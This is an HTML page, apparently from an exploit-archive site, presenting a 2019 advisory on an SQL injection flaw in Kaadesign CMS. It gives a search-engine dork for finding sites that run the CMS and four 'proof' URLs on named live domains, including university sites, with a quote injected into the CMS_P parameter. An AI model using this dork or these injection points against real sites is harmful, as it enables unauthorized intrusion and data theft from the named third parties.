<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-1</title>
    </head>
    <body>
        <center>
                <a  href="exploit-1" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            Kaadesign CMS Sql Injection Vulnerability
2019.01.07
gb Guardiran Security Team (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"تصميم وتطوير شركة الموسوعة العراقية" & inurl:CMS.php?CMS_P=
############################################
# Title :  Kaadesign CMS Sql Injection Vulnerability
# Author : Guardiran Security Team
# category : webapps
# Tested On : Win 10 , Kali Linux
# Vendor HomePage : http://www.kaadesign.com/
# Google Dork:intext:"تصميم وتطوير شركة الموسوعة العراقية"   &  inurl:CMS.php?CMS_P=
############################################
#PROF :
http://www.kmciq.com/Arabic/CMS.php?CMS_P=10' [Sql injection Vulnerability]
http://www.kmc.edu.iq/Arabic/CMS.php?CMS_P=17'[Sql injection Vulnerability]
http://uruk.edu.iq/English/CMS.php?CMS_P=57'[Sql injection Vulnerability]
http://www.urukuni.com/CMS.php?CMS_P=48'[Sql injection Vulnerability]

#Discovered by :  injectorcoder 
=======
        </pre>
    </body>
</html>
